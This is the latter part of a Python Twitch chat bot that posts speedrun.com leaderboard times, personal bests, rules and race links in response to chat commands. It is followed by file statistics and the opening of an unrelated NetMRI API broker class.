    if input == message.lower().split()[0].strip():
        # Check to see if an argument is specified first
        argument = False
        try:
            message.lower().split()[1]
        except IndexError:
            pass
        else:
            argument = True
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        if isEmulator(title):
            emulators = 'true'
        else:
            emulators = 'false'
        game, platform, platform_title = getGame(USER_ID)
        # A "[Platform]" tag in the title overrides the detected platform
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform = PLATFORMS[i][1]
                    platform_title = PLATFORMS[i][0]
                    break
        category = None
        category_title = None
        # Check again to see if an argument was specified
        if not argument:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category = CATEGORIES[i][1]
                    category_title = CATEGORIES[i][0]
                    break
        else:
            specified_category = message.lower().split(input, 1)[-1].strip()
            for i in range(len(CATEGORIES)):
                if specified_category == CATEGORIES[i][0].lower():
                    category_title = CATEGORIES[i][0]
                    category = CATEGORIES[i][1]
                    break
            if category is None:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        # Original code emitted the same message for a missing game and a
        # missing category, so the two checks are merged here.
        if game is None or category is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        try:
            response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=3&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "HTTPError: Please try again")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        # BUG FIX: a leaderboard with fewer than 3 runs previously raised an
        # uncaught IndexError here and crashed the handler.
        try:
            runner = lst['data']['players']['data'][2]['names']['international']
            time_in_sec = int(lst['data']['runs'][2]['run']['times']['realtime_t'])
        except (IndexError, KeyError):
            sendMessage(s, CHANNEL, "Error: Fewer than 3 runs on this leaderboard")
            cooldown()
            return
        hours = divmod(time_in_sec, 3600)
        minutes = divmod(hours[1], 60)
        seconds = minutes[1]
        if hours[0] > 0:
            place3rd = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
        elif minutes[0] > 0:
            place3rd = str(minutes[0]) + "m " + str(seconds) + "s "
        else:
            place3rd = str(seconds) + "s "
        sendMessage(s, CHANNEL, "The 3rd place time for " + category_title + " is " + place3rd + "by " + runner + ".")
        cooldown()
        return
def fourth(input):
    """Post the 4th place leaderboard time for the current game/category.

    Triggered when the first word of the chat message equals *input*
    (e.g. "!4th"). The category is taken from an optional argument after
    the command, otherwise detected from the stream title. Reads module
    globals (message, s, CHANNEL, CATEGORIES, PLATFORMS) and sends the
    result to chat.
    """
    if input == message.lower().split()[0].strip():
        # Check to see if an argument is specified first
        argument = False
        try:
            message.lower().split()[1]
        except IndexError:
            pass
        else:
            argument = True
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        if isEmulator(title):
            emulators = 'true'
        else:
            emulators = 'false'
        game, platform, platform_title = getGame(USER_ID)
        # A "[Platform]" tag in the title overrides the detected platform
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform = PLATFORMS[i][1]
                    platform_title = PLATFORMS[i][0]
                    break
        category = None
        category_title = None
        # Check again to see if an argument was specified
        if not argument:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category = CATEGORIES[i][1]
                    category_title = CATEGORIES[i][0]
                    break
        else:
            specified_category = message.lower().split(input, 1)[-1].strip()
            for i in range(len(CATEGORIES)):
                if specified_category == CATEGORIES[i][0].lower():
                    category_title = CATEGORIES[i][0]
                    category = CATEGORIES[i][1]
                    break
            if category is None:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        # Original code emitted the same message for a missing game and a
        # missing category, so the two checks are merged here.
        if game is None or category is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        try:
            response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=4&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "HTTPError: Please try again")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        # BUG FIX: a leaderboard with fewer than 4 runs previously raised an
        # uncaught IndexError here and crashed the handler.
        try:
            runner = lst['data']['players']['data'][3]['names']['international']
            time_in_sec = int(lst['data']['runs'][3]['run']['times']['realtime_t'])
        except (IndexError, KeyError):
            sendMessage(s, CHANNEL, "Error: Fewer than 4 runs on this leaderboard")
            cooldown()
            return
        hours = divmod(time_in_sec, 3600)
        minutes = divmod(hours[1], 60)
        seconds = minutes[1]
        if hours[0] > 0:
            place4th = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
        elif minutes[0] > 0:
            place4th = str(minutes[0]) + "m " + str(seconds) + "s "
        else:
            place4th = str(seconds) + "s "
        sendMessage(s, CHANNEL, "The 4th place time for " + category_title + " is " + place4th + "by " + runner + ".")
        cooldown()
        return
def fifth(input):
    """Post the 5th place leaderboard time for the current game/category.

    Triggered when the first word of the chat message equals *input*
    (e.g. "!5th"). The category is taken from an optional argument after
    the command, otherwise detected from the stream title. Reads module
    globals (message, s, CHANNEL, CATEGORIES, PLATFORMS) and sends the
    result to chat.
    """
    if input == message.lower().split()[0].strip():
        # Check to see if an argument is specified first
        argument = False
        try:
            message.lower().split()[1]
        except IndexError:
            pass
        else:
            argument = True
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        if isEmulator(title):
            emulators = 'true'
        else:
            emulators = 'false'
        game, platform, platform_title = getGame(USER_ID)
        # A "[Platform]" tag in the title overrides the detected platform
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform = PLATFORMS[i][1]
                    platform_title = PLATFORMS[i][0]
                    break
        category = None
        category_title = None
        # Check again to see if an argument was specified
        if not argument:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category = CATEGORIES[i][1]
                    category_title = CATEGORIES[i][0]
                    break
        else:
            specified_category = message.lower().split(input, 1)[-1].strip()
            for i in range(len(CATEGORIES)):
                if specified_category == CATEGORIES[i][0].lower():
                    category_title = CATEGORIES[i][0]
                    category = CATEGORIES[i][1]
                    break
            if category is None:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        # Original code emitted the same message for a missing game and a
        # missing category, so the two checks are merged here.
        if game is None or category is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        try:
            response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=5&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "HTTPError: Please try again")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        # BUG FIX: a leaderboard with fewer than 5 runs previously raised an
        # uncaught IndexError here and crashed the handler.
        try:
            runner = lst['data']['players']['data'][4]['names']['international']
            time_in_sec = int(lst['data']['runs'][4]['run']['times']['realtime_t'])
        except (IndexError, KeyError):
            sendMessage(s, CHANNEL, "Error: Fewer than 5 runs on this leaderboard")
            cooldown()
            return
        hours = divmod(time_in_sec, 3600)
        minutes = divmod(hours[1], 60)
        seconds = minutes[1]
        if hours[0] > 0:
            place5th = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
        elif minutes[0] > 0:
            place5th = str(minutes[0]) + "m " + str(seconds) + "s "
        else:
            place5th = str(seconds) + "s "
        sendMessage(s, CHANNEL, "The 5th place time for " + category_title + " is " + place5th + "by " + runner + ".")
        cooldown()
        return
#Returns the channel owner's personal best time for the category that's written in the stream title
def personalBest(input):
    """Post a user's personal best: "!pb [src_user] [category]".

    With no arguments, looks up the channel owner's registered
    speedrun.com username and the category found in the stream title.
    Reads module globals (message, s, CHANNEL, channel_list, ADMIN,
    CATEGORIES, PLATFORMS) and sends the result to chat.
    """
    if input == message.lower().split()[0]:
        # Resolve the channel's speedrun.com username; fall back to ADMIN
        SRC_USERNAME = ''
        for entry in channel_list:
            if CHANNEL in entry:
                SRC_USERNAME = entry.split(":")[1].strip('\n')
                break
        else:
            SRC_USERNAME = ADMIN
        # A third token means the caller named a category explicitly
        category_specified = False
        try:
            message.split()[2]
        except IndexError:
            pass
        else:
            category_specified = True
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        game, platform, platform_title = getGame(USER_ID)
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform_title = PLATFORMS[i][0]
                    break
        category_title = None
        if category_specified:
            # BUG FIX: the old message.lower().strip('!pb ') removed any of
            # the characters '!', 'p', 'b', ' ' from BOTH ends, corrupting
            # usernames/categories that start or end with those characters.
            # Splitting off the command and username tokens is exact.
            category_title = message.lower().split(None, 2)[2].strip()
            check = False
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() == category_title:
                    check = True
                    category_title = CATEGORIES[i][0]
                    break
            if not check:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        else:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category_title = CATEGORIES[i][0]
                    break
        # Both failure modes emitted the same message originally; merged.
        if game is None or category_title is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        # Optional second token is the speedrun.com username to look up
        try:
            username = message.split()[1]
        except IndexError:
            username = SRC_USERNAME
        try:
            response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        place = None
        time_in_sec = None
        for cat in lst['data']:
            if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
                time_in_sec = int(cat['run']['times']['realtime_t'])
                place = cat['place']
                break
        if place is None:
            sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
            cooldown()
            return
        # 1 -> "1st", 2 -> "2nd", 11 -> "11th", etc.
        ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
        hours = divmod(time_in_sec, 3600)
        minutes = divmod(hours[1], 60)
        seconds = minutes[1]
        if hours[0] > 0:
            pb = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s"
        elif minutes[0] > 0:
            pb = str(minutes[0]) + "m " + str(seconds) + "s"
        else:
            pb = str(seconds) + "s"
        sendMessage(s, CHANNEL, username.title() + "\'s " + category_title + " PB is " + pb + " (" + ordinal(place) + " place).")
        cooldown()
def lastPB(input):
    """Post the date of a user's most recent PB: "!lastpb [src_user] [category]".

    With no arguments, looks up the channel owner's registered
    speedrun.com username and the category found in the stream title.
    Reads module globals (message, s, CHANNEL, channel_list, ADMIN,
    CATEGORIES, PLATFORMS) and sends the result to chat.
    """
    if input == message.lower().split()[0]:
        # Resolve the channel's speedrun.com username; fall back to ADMIN
        SRC_USERNAME = ''
        for entry in channel_list:
            if CHANNEL in entry:
                SRC_USERNAME = entry.split(":")[1].strip('\n')
                break
        else:
            SRC_USERNAME = ADMIN
        # A third token means the caller named a category explicitly
        category_specified = False
        try:
            message.split()[2]
        except IndexError:
            pass
        else:
            category_specified = True
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        game, platform, platform_title = getGame(USER_ID)
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform_title = PLATFORMS[i][0]
                    break
        category_title = None
        if category_specified:
            # BUG FIX: the old message.lower().strip('!lastpb ') removed any
            # of the characters '!', 'l', 'a', 's', 't', 'p', 'b', ' ' from
            # BOTH ends, corrupting usernames/categories that start or end
            # with those characters. Token split is exact.
            category_title = message.lower().split(None, 2)[2].strip()
            check = False
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() == category_title:
                    check = True
                    category_title = CATEGORIES[i][0]
                    break
            if not check:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        else:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category_title = CATEGORIES[i][0]
                    break
        # Both failure modes emitted the same message originally; merged.
        if game is None or category_title is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        # Optional second token is the speedrun.com username to look up
        try:
            username = message.split()[1]
        except IndexError:
            username = SRC_USERNAME
        try:
            response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        place = None
        date = None
        for cat in lst['data']:
            if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
                place = cat['place']
                date = cat['run']['date']
                break
        if place is None:
            sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
            cooldown()
            return
        sendMessage(s, CHANNEL, username.title() + " last PBed in " + category_title + " on " + date + ".")
        cooldown()
def runs(input):
    """Post all of a user's PBs for the current game: "!runs [src_user]".

    Reads module globals (message, s, CHANNEL, channel_list, ADMIN,
    PLATFORMS) and sends the formatted list to chat, splitting it across
    two messages when it exceeds Twitch's length limit.
    """
    if input == message.lower().split()[0]:
        # Resolve the channel's speedrun.com username; fall back to ADMIN
        SRC_USERNAME = ''
        for entry in channel_list:
            if CHANNEL in entry:
                SRC_USERNAME = entry.split(":")[1].strip('\n')
                break
        else:
            SRC_USERNAME = ADMIN
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        game, platform, platform_title = getGame(USER_ID)
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform_title = PLATFORMS[i][0]
                    break
        if game is None:
            sendMessage(s, CHANNEL, "Error: No game info found")
            cooldown()
            return
        # Optional second token is the speedrun.com username to look up
        try:
            username = message.split()[1]
        except IndexError:
            username = SRC_USERNAME
        try:
            response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=game,platform,category&game={}'.format(username, game))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        # 1 -> "1st", 2 -> "2nd", 11 -> "11th", etc.
        ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
        if not lst['data']:
            sendMessage(s, CHANNEL, username.title() + " has no submitted runs for the current game.")
            cooldown()
            return
        list_of_runs = []
        for run in lst['data']:
            time_in_sec = int(run['run']['times']['realtime_t'])
            place = run['place']
            category_title = run['category']['data']['name']
            hours = divmod(time_in_sec, 3600)
            minutes = divmod(hours[1], 60)
            seconds = minutes[1]
            if hours[0] > 0:
                pb = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s"
            elif minutes[0] > 0:
                pb = str(minutes[0]) + "m " + str(seconds) + "s"
            else:
                pb = str(seconds) + "s"
            #add run to the list to be printed
            list_of_runs.append(category_title + " in " + pb + " (" + ordinal(place) + ")")
        game_title = lst['data'][0]['game']['data']['names']['international']
        run_message = username.title() + "\'s " + game_title + " PBs: " + ", ".join(list_of_runs) + "."
        if len(run_message) < 500:
            sendMessage(s, CHANNEL, run_message)
            # BUG FIX: this branch previously skipped the cooldown, unlike
            # every other command's success path.
            cooldown()
        elif len(run_message) < 1000:
            # Twitch caps message length, so split into two chunks
            sendMessage(s, CHANNEL, run_message[0:500])
            sendMessage(s, CHANNEL, run_message[500:])
            cooldown()
        else:
            sendMessage(s, CHANNEL, "This user's list of PBs is too long. Go look it up.")
            cooldown()
#Tells user the leaderboard standing of the channel owner, or a specified user
def place(input):
    """Post a user's leaderboard placing: "!place [src_user] [category]".

    With no arguments, looks up the channel owner's registered
    speedrun.com username and the category found in the stream title.
    Reads module globals (message, s, CHANNEL, channel_list, ADMIN,
    CATEGORIES, PLATFORMS) and sends the result to chat.
    """
    if input == message.lower().split()[0]:
        # Resolve the channel's speedrun.com username; fall back to ADMIN
        SRC_USERNAME = ''
        for entry in channel_list:
            if CHANNEL in entry:
                SRC_USERNAME = entry.split(":")[1].strip('\n')
                break
        else:
            SRC_USERNAME = ADMIN
        # A third token means the caller named a category explicitly
        category_specified = False
        try:
            message.split()[2]
        except IndexError:
            pass
        else:
            category_specified = True
        # Optional second token is the speedrun.com username to look up
        try:
            username = message.split()[1]
        except IndexError:
            username = SRC_USERNAME
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        game, platform, platform_title = getGame(USER_ID)
        if '[' in title and ']' in title:
            for i in range(len(PLATFORMS)):
                if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
                    platform_title = PLATFORMS[i][0]
                    break
        category_title = None
        if category_specified:
            # BUG FIX: the old message.lower().strip('!place ') removed any
            # of the characters '!', 'p', 'l', 'a', 'c', 'e', ' ' from BOTH
            # ends, corrupting usernames/categories that start or end with
            # those characters. Token split is exact.
            category_title = message.lower().split(None, 2)[2].strip()
            check = False
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() == category_title:
                    check = True
                    category_title = CATEGORIES[i][0]
                    break
            if not check:
                sendMessage(s, CHANNEL, "Error: Invalid category specified")
                cooldown()
                return
        else:
            for i in range(len(CATEGORIES)):
                if CATEGORIES[i][0].lower() in title:
                    category_title = CATEGORIES[i][0]
                    break
        # Both failure modes emitted the same message originally; merged.
        if game is None or category_title is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        try:
            response = urlopen('https://www.speedrun.com/api/v1/users/{}/personal-bests?embed=category,game,platform'.format(username))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "Error: Speedrun.com user not found")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        place = None
        for cat in lst['data']:
            if cat['category']['data']['name'].lower() == category_title.lower() and cat['game']['data']['abbreviation'].lower() == game and cat['platform']['data']['name'].lower() == platform_title.lower():
                place = cat['place']
                break
        if place is None:
            sendMessage(s, CHANNEL, username.title() + " currently does not have a PB for " + category_title + " on the leaderboard.")
            cooldown()
            return
        # 1 -> "1st", 2 -> "2nd", 11 -> "11th", etc.
        ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(math.floor(n/10)%10!=1)*(n%10<4)*n%10::4])
        sendMessage(s, CHANNEL, username.title() + " is in " + ordinal(place) + " place for " + category_title + ".")
        # BUG FIX: the success path previously skipped the cooldown, unlike
        # every other command.
        cooldown()
def leaderboard(input):
    """Post a speedrun.com leaderboard link for the game/category in the stream title."""
    if input != message.lower().strip():
        return
    # Resolve the channel's Twitch user id
    try:
        USER_ID = getUserID(CHANNEL)
    except LookupError:
        sendMessage(s, CHANNEL, "User not found")
        cooldown()
        return
    title = getStreamTitle(USER_ID)
    game, platform, platform_title = getGame(USER_ID)
    # Map the game abbreviation back to its display name
    game_title = None
    for entry in GAMES:
        if entry[1] == game:
            game_title = entry[0]
            break
    # Detect the category from the stream title
    category = None
    category_title = None
    for entry in CATEGORIES:
        if entry[0].lower() in title:
            category = entry[1]
            category_title = entry[0]
            break
    # Both failure modes produce the identical chat message
    if game is None or category is None:
        sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
        cooldown()
        return
    sendMessage(s, CHANNEL, game_title + " " + category_title + " Leaderboard: https://www.speedrun.com/{}#{}".format(game, category))
    cooldown()
    return
def listRules(input):
    """Post the rules for the current game/category from speedrun.com.

    Reads module globals (message, s, CHANNEL, GAMES, CATEGORIES) and
    sends the joined rule text to chat.
    """
    if input == message.lower().strip():
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        game, platform, platform_title = getGame(USER_ID)
        game_title = None
        for i in range(len(GAMES)):
            if GAMES[i][1] == game:
                game_title = GAMES[i][0]
                break
        category = None
        category_title = None
        for i in range(len(CATEGORIES)):
            if CATEGORIES[i][0].lower() in title:
                category = CATEGORIES[i][1]
                category_title = CATEGORIES[i][0]
                break
        # Original code emitted the same message for a missing game and a
        # missing category, so the two checks are merged here.
        if game is None or category is None:
            sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
            cooldown()
            return
        try:
            response = urlopen('https://www.speedrun.com/api/v1/games/{}/categories'.format(game))
        except urllib.error.HTTPError:
            sendMessage(s, CHANNEL, "HTTP Error")
            cooldown()
            return
        readable = response.read().decode('utf-8')
        lst = loads(readable)
        rules = ' '
        for cat in lst['data']:
            if cat['name'].lower() == category_title.lower():
                rules = cat['rules'].split('\r\n')
        # BUG FIX: the old loop did "rule = rule.strip('-')" and discarded
        # the result, so leading/trailing dashes were never removed.
        rules = [rule.strip('-') for rule in rules]
        list_of_rules = ' '.join(rules)
        sendMessage(s, CHANNEL, game_title + " " + category_title + " rules: " + list_of_rules)
        cooldown()
        return
def listGames(input):
    """Post the names of all games this bot supports."""
    if input != message.lower().strip():
        return
    supported = ", ".join(entry[0] for entry in GAMES)
    sendMessage(s, CHANNEL, "Games currently supported: " + supported)
    cooldown()
    return
#Returns a kadgar.net link with the channel owner and the other racers if a race is happening
def raceCommand(input):
    """Post a kadgar.net multi-stream link for a race listed in the stream title.

    Racers are read from the words following "race with" in the title
    (trailing commas are stripped). Reads module globals (message, s,
    CHANNEL) and sends the link to chat.
    """
    if input == message.lower().strip():
        # get user ID of current channel
        try:
            USER_ID = getUserID(CHANNEL)
        except LookupError:
            sendMessage(s, CHANNEL, "User not found")
            cooldown()
            return
        # get title of current channel
        title = getStreamTitle(USER_ID)
        if 'race with' not in title:
            sendMessage(s, CHANNEL, CHANNEL.title() + " is not currently racing or no racers found in stream title.")
            cooldown()
            return
        title_list = title.split()
        r = title_list.index('with') + 1
        # BUG FIX: the old manual while-loop raised an IndexError when no
        # names followed "with"; a slice handles the empty case safely.
        contenders = [name.strip(',') for name in title_list[r:]]
        if not contenders:
            sendMessage(s, CHANNEL, CHANNEL.title() + " is not currently racing or no racers found in stream title.")
            cooldown()
            return
        sendMessage(s, CHANNEL, "Race link: http://kadgar.net/live/" + CHANNEL + "/" + "/".join(contenders))
        cooldown()
#Displays commands
def getCommands(input):
    """Post the list of chat commands this bot understands."""
    if message.strip().lower() != input:
        return
    sendMessage(s, CHANNEL, '/me commands: !wr • !2nd • !3rd • !4th • !5th • !pb • !lastpb • !runs • !place • !leaderboard • !rules • !race • !games • !help')
    cooldown()
#Documentation
def docs(input):
    """Post a link to the bot's online documentation."""
    if message.lower().strip() != input:
        return
    sendMessage(s, CHANNEL, "speedrunb0t's documentation can be found here: https://dechrissen.github.io/speedrunb0t/#bot-commands")
    cooldown()
#Global cooldown
def cooldown():
    """Block for COOLDOWN seconds after a command, unless exempt.

    The admin and the channel owner are exempt. Reads module globals
    (user, ADMIN, CHANNEL, COOLDOWN).
    """
    if user == ADMIN or user == CHANNEL:
        pass
    elif user:
        # BUG FIX: the old implementation spun in a busy-wait loop calling
        # time.time(), pegging a CPU core for the whole cooldown. sleep()
        # blocks for the same duration without burning CPU.
        time.sleep(COOLDOWN)
#Checks if a message is from Twitch or a user
def Console(line):
    """Return True when *line* is a server/console message rather than a user PRIVMSG."""
    return "PRIVMSG" not in line
#Quits the bot program (admin only)
def quitCommand(input):
    """Shut the bot down if the sender is the admin; otherwise refuse.

    Reads module globals (message, user, s, ADMIN, CHANNEL).
    """
    if input == message.strip().lower() and user == ADMIN:
        sendMessage(s, ADMIN, "/me has disconnected.")
        quit()
    elif input == message.strip().lower():
        # BUG FIX: the refusal branch previously compared against the
        # non-lowercased message, so e.g. "!KILL" from a non-admin
        # produced no response at all.
        sendMessage(s, CHANNEL, "@" + user.title() + " Only the Administrator may use the !kill command.")
        cooldown()
# --- Bot entry point: connect, join all configured channels, then read and
# --- dispatch chat messages forever.
s = openSocket()
joinRoom(s)
readbuffer = ""
# channels.txt holds "channel:src_username" pairs, one per line
with open("channels.txt", "r") as f:
    channel_list = f.readlines()
for chan in channel_list:
    chan = chan.split(":")[0]
    if chan != ADMIN:
        s.send(("JOIN #" + chan + "\r\n").encode())
        #sendMessage(s, chan, "/me [Connected]")
while True:
    # Pull the next chunk off the IRC socket and split into lines
    readbuffer = s.recv(1024)
    readbuffer = readbuffer.decode()
    temp = readbuffer.split("\n")
    readbuffer = readbuffer.encode()
    # NOTE(review): the trailing partial line popped here is overwritten by
    # the next recv() above, so a message split across two TCP reads is
    # dropped rather than reassembled — confirm whether this is acceptable.
    readbuffer = temp.pop()
    for line in temp:
        try:
            print(line)
        except OSError as err:
            print('OSError: Invalid symbol')
            continue
        # Answer server keep-alive pings so Twitch doesn't drop the bot
        if "PING" in line and Console(line):
            msgg = "PONG tmi.twitch.tv\r\n".encode()
            s.send(msgg)
            print(msgg)
            break
        # Skip other raw server notices
        if ".tmi.twitch.tv" in line and Console(line):
            break
        # Parse sender, message text, and channel from the IRC line; these
        # module-level globals are read by all the command handlers above.
        user = getUser(line)
        message = getMessage(line)
        CHANNEL = getChannel(line)
        # Only lines containing a command sigil are worth dispatching
        if '!' not in message and '$' not in message:
            continue
        print(user + " said: " + message)
        #Chat commands: each handler checks whether the message matches its
        #trigger word and returns immediately when it doesn't.
        getCommands('!commands')
        worldRecord('!wr')
        worldRecord('!1st')
        second('!2nd')
        third('!3rd')
        fourth('!4th')
        fifth('!5th')
        personalBest('!pb')
        lastPB('!lastpb')
        runs('!runs')
        place('!place')
        leaderboard('!leaderboard')
        listRules('!rules')
        listGames('!games')
        raceCommand('!race')
        setSRCName('!setsrcname')
        docs('!help')
        joinChannel('$invite')
        addChannel('!addchannel')
        channels('!channels')
        quitCommand('!kill')
        continue
| 36.226457
| 211
| 0.523179
| 5,208
| 48,471
| 4.813556
| 0.064324
| 0.045953
| 0.06897
| 0.035422
| 0.800351
| 0.784634
| 0.76445
| 0.739998
| 0.731581
| 0.718218
| 0
| 0.014172
| 0.356543
| 48,471
| 1,337
| 212
| 36.253553
| 0.789189
| 0.038992
| 0
| 0.774077
| 0
| 0.009901
| 0.132409
| 0.003997
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023402
| false
| 0.011701
| 0.010801
| 0
| 0.109811
| 0.0036
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8d60ce7886685b9d361abd82b81c21ee2c199ad
| 31,150
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/sdn_network_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class SdnNetworkBroker(Broker):
controller = "sdn_networks"
def index(self, **kwargs):
    """List the available sdn networks.

    Any of the inputs listed below may be used to narrow the list; other
    inputs are ignored. Of the various ways to query lists, this method
    is the most efficient.

    :param sdn_network_id: (Array of Integer, optional) Internal NetMRI identifier for this network.
    :param sdn_network_key: (Array of String, optional) Unique identifier of each network at the SDN controller side.
    :param methods: (Array of String, optional) Sdn network methods called on each returned record and included in the output. Available: fabric_handle.
    :param start: (Integer, optional, default 0) Record number to return in the selected page of data.
    :param limit: (Integer, optional, default 1000) Page size; maximum is 10000.
